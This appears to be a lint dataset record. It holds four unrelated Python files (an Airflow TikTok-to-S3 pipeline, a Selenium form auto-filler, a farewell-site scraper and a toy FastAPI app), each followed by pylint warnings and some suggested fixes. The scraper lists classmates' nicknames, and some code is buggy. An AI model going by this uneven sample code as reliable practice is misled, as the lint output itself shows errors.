1 - refactor: too-few-public-methods
|
1 from datetime import timedelta, datetime
2 import json
3 import time
4 import os
5 import airflow
6 from urllib.request import urlopen
7 import pandas as pd
8 import http.client
9 import configparser
10
11 from airflow import DAG
12 from airflow.operators.bash_operator import BashOperator
13 from airflow.operators.dummy_operator import DummyOperator
14 from airflow.operators.python_operator import PythonOperator
15 from airflow.utils.dates import days_ago
16 import airflow.hooks.S3_hook
17 import boto3
18
19 s3 = boto3.resource('s3')
20
21 config = configparser.ConfigParser()
22 config.read(f"{os.path.expanduser('~')}/airflow/api.config")
23
24
25 def get_api_data():
26 print(os.getcwd())
27 conn = http.client.HTTPSConnection("tiktok.p.rapidapi.com")
28
29 headers = {
30 'x-rapidapi-key': config["rapidapi"]["API_RAPIDAPI_KEY"],
31 'x-rapidapi-host': "tiktok.p.rapidapi.com"
32 }
33
34 conn.request("GET", "/live/trending/feed", headers=headers)
35
36 res = conn.getresponse()
37 data = res.read()
38 json_data = json.loads(data.decode("utf-8"))
39 return json_data
40
41
42 def get_clean_data(**context):
43 video_data = []
44 author_data = []
45 media = context['task_instance'].xcom_pull(task_ids='get_data', key='return_value').get('media')
46 if media:
47 for item in media:
48 video_attr = (
49 item["video_id"],
50 item["create_time"],
51 item["description"],
52 item["video"]["playAddr"],
53 item['statistics']
54 )
55 author_attr = (
56 item['author']['nickname'],
57 item['author']['uniqueId'],
58 item['author']['followers'],
59 item['author']['heartCount'],
60 item['author']['videoCount']
61 )
62 video_data.append(video_attr)
63 author_data.append(author_attr)
64 author_df = pd.DataFrame(author_data, columns=('nickname', 'id', 'followers', 'heartCount', 'videoCount'))
65 video_df = pd.DataFrame(video_data, columns=('video_id', 'create_time', 'description', 'playAddr', 'statistics'))
66 video_df["create_time"]= pd.to_datetime(video_df['create_time'].apply(lambda x: datetime.fromtimestamp(int(x))))
67 video_df.to_csv(f"{os.path.expanduser('~')}/airflow/data/video.csv", index=None)
68 author_df.to_csv(f"{os.path.expanduser('~')}/airflow/data/author.csv", index=None)
69
70 def upload_file_to_S3_with_hook(filename, key, bucket_name):
71 hook = airflow.hooks.S3_hook.S3Hook('aws_default')
72 hook.load_file(filename, key, bucket_name)
73
74
75 default_args = {
76 'owner': 'airflow',
77 'start_date': days_ago(5),
78 'email': ['airflow@my_first_dag.com'],
79 'email_on_failure': False,
80 'email_on_retry': False,
81 'retries': 1,
82 'retry_delay': timedelta(minutes=5),
83 }
84
85
86
87 with DAG(
88 'tiktok_dag',
89 default_args=default_args,
90 description='Our first DAG',
91 schedule_interval="*/2 * * * *",
92 ) as dag:
93 get_data = PythonOperator(
94 task_id='get_data',
95 python_callable=get_api_data,
96 dag=dag
97 )
98 clean_data = PythonOperator(
99 task_id='clean_data',
100 python_callable=get_clean_data,
101 dag=dag,
102 provide_context=True
103 )
104
105 s3_tasks = []
106
107 for file in [f"{os.path.expanduser('~')}/airflow/data/author.csv",
108 f"{os.path.expanduser('~')}/airflow/data/video.csv"]:
109 upload_to_S3_task = PythonOperator(
110 task_id=f'upload_to_S3_{file.split("/")[-1]}',
111 python_callable=upload_file_to_S3_with_hook,
112 op_kwargs={
113 'filename': file,
114 'key': f'{datetime.now().strftime("%Y-%b-%d/%H-%M")}-{file.split("/")[-1]}',
115 'bucket_name': f'tiktok-fun',
116 },
117 dag=dag)
118
119 s3_tasks.append(upload_to_S3_task)
120
121 opr_end = BashOperator(task_id='opr_end', bash_command='echo "Done"')
122
123
124 get_data >> clean_data >> s3_tasks >> opr_end
| 115 - warning: f-string-without-interpolation
124 - warning: pointless-statement
3 - warning: unused-import
6 - warning: unused-import
13 - warning: unused-import
|
1 #import libraries
2 from selenium import webdriver
3 from selenium.webdriver.common.by import By
4 import time
5 from datetime import datetime
6 import pandas as pd
7
8 #path for webdriver
9 driverpath = "PATH for your chromedriver"
10
11 #load data from csv file
12 df = pd.read_csv("si126_namelist.csv")
13 urllist = list(df[df.GSX == True].formlink)
14 namelist = list(df[df.GSX == True].nickname)
15
16
17 #sending mail merge
18
19 for i in range(len(urllist)):
20 #rest time from previous session
21 driver = webdriver.Chrome(driverpath)
22 time.sleep(3)
23
24 sending_url = driver.get(urllist[i])
25 send_to = namelist[i]
26
27 time.sleep(1)
28
29 sender_txt = "@sikawit"
30 greeting_txt = f"""Hi {send_to.strip()}!
31
32 Congratulations, doctor! You have finally reached one of the toughest finish lines there is (the one I ran away from, haha). Be a good doctor; I hope we meet again (hopefully not as your patient). If there is anything I can help with, just let me know.
33 
34 Congratulations once again,
35 Sake
36
37 *****
38 Generated from a bot on {datetime.now().astimezone().strftime("%Y-%m-%d %H:%M:%S UTC%Z")}
39 Find out more at https://github.com/sikawit/FarewellSI126"""
40
41 sender_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')
42 sender_fill.send_keys(sender_txt)
43
44 greeting_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div[2]/textarea')
45 greeting_fill.send_keys(greeting_txt)
46
47 submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div/div/span')
48 submit.click()
49
50 time.sleep(3)
51
52 driver.close()
53
54
| 3 - warning: unused-import
|
1 #import libraries
2 from bs4 import BeautifulSoup
3 from urllib.request import urlopen
4 import urllib.error
5 import pandas as pd
6
7 #define func to find subfolder
8 def find_folder(student_id: int):
9 if student_id < 1 :
10 return None
11 elif student_id <= 50 :
12 return "001-050"
13 elif student_id <= 100 :
14 return "051-100"
15 elif student_id <= 150 :
16 return "101-150"
17 elif student_id <= 200 :
18 return "151-200"
19 elif student_id <= 250 :
20 return "201-250"
21 elif student_id <= 300 :
22 return "251-300"
23 elif student_id <= 326 :
24 return "301-326"
25 else:
26 return None
27
28 # define func to get url
29 def url_si(student_id):
30 return f"https://sites.google.com/view/seniorfarewell2021/mirror/{find_folder(i)}/{i:03d}"
31
32
33 # create blank list to collect url and HTTP response code
34 urllist = list()
35 checkerlist = list()
36 for i in range(326 + 1):
37 urllist.append(url_si(i))
38 urllist[0] = ""
39
40
41 #check whether each person's page exists
42 for i in range(327):
43 try:
44 urlopen(url_si(i))
45 except urllib.error.HTTPError as e:
46 checkerlist.append(404)
47 else:
48 checkerlist.append(200)
49
50
51 # finding name and real google doc path
52 namelist = list()
53 formlist = list()
54 for i in range(327):
55 if checkerlist[i] == 200:
56 bsObj = BeautifulSoup(urlopen(urllist[i]))
57 title = bsObj.find("h1").getText()
58 gform = bsObj.find_all("a", href=True)[-2]['href']
59 namelist.append(title)
60 formlist.append(gform)
61 else:
62 namelist.append("NotFound 404")
63 formlist.append("404 Not Found")
64
65
66 #Check GSX, send to my high-school classmates
67 #Because of duplicated nicknames, please check manually
68
69 is_gsx = [False] * 327 #0 to 326 people in SI126 code
70
71 is_gsx[11] = True # Max
72 is_gsx[12] = True # Film
73 is_gsx[23] = True # Pea
74 is_gsx[26] = True # Poom
75 is_gsx[28] = True # Win Sukrit
76 is_gsx[33] = True # Krit Kitty
77 is_gsx[37] = True # Ball
78 is_gsx[59] = True # Ji
79 is_gsx[61] = True # Tong
80 is_gsx[104] = True # Now
81 is_gsx[130] = True # Pond
82 is_gsx[139] = True # Thames
83 is_gsx[142] = True # Win Nawin
84 is_gsx[147] = True # Jan
85 is_gsx[164] = True # Mhee
86 is_gsx[185] = True # Jane Glasses
87 is_gsx[200] = True # Ana
88 is_gsx[209] = True # Jane Juice
89 is_gsx[232] = True # Fangpao
90 is_gsx[277] = True # Guggug
91 is_gsx[285] = True # Ken Whale
92 is_gsx[290] = True # Bell Tao
93
94 #create pandas dataframe from lists
95 si126_df = pd.DataFrame({
96 'url': urllist,
97 'formlink':formlist,
98 'title' : namelist,
99 'status': checkerlist,
100 "GSX" : is_gsx
101 })
102
103
104 #save dataframe to csv
105 si126_df.to_csv("si126_namelist.csv")
106
107
108 #clean up some minor text manually: add missing names and strip whitespace (done in a text editor)
109
110
111 #read the csv file back in after the manual cleanup
112 si126_df = pd.read_csv("si126_namelist.csv")
113
114
115 #find his/her nickname
116 si126_df["nickname"] = si126_df.title.str.split(" ",expand = True,n=1)[0]
117
118
119 #export to csv again
120 si126_df.to_csv("si126_namelist.csv")
121
122
123
| 9 - refactor: no-else-return
8 - refactor: too-many-return-statements
29 - warning: unused-argument
34 - refactor: use-list-literal
35 - refactor: use-list-literal
44 - refactor: consider-using-with
52 - refactor: use-list-literal
53 - refactor: use-list-literal
56 - refactor: consider-using-with
|
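The unused-argument warning above points at a real bug: url_si ignores student_id and closes over the loop variable i instead. A corrected sketch:

def url_si(student_id: int) -> str:
    folder = find_folder(student_id)
    return f"https://sites.google.com/view/seniorfarewell2021/mirror/{folder}/{student_id:03d}"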
1 from fastapi import FastAPI
2 from fastapi.responses import HTMLResponse as hr
3 from fastapi.responses import RedirectResponse as rr
4 from fastapi.responses import FileResponse
5
6 app = FastAPI()
7
8 file_path="TinDog-start-masrter2/index.html"
9
10 @app.get("/")
11 async def rout():
12 return FileResponse(file_path)
13
14
15
16 @app.get("/reshtml", response_class=hr)
17 async def rout():
18 return """<html>
19 <body><h1>fsdfdfs</h1></body>
20 </html>
21
22 """
23
24 @app.get("/item/{item}")
25 async def item(item):
26 return item
27
28 @app.get("/redirectex", response_class = rr)
29 async def redirect():
30 return "https://google.com/"
| 17 - error: function-redefined
25 - warning: redefined-outer-name
|
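The function-redefined error above comes from two handlers both named rout; FastAPI dispatches on the decorator path, so giving each handler a distinct (hypothetical) name resolves it:

@app.get("/")
async def serve_index():
    return FileResponse(file_path)

@app.get("/reshtml", response_class=hr)
async def serve_html():
    return "<html><body><h1>example</h1></body></html>"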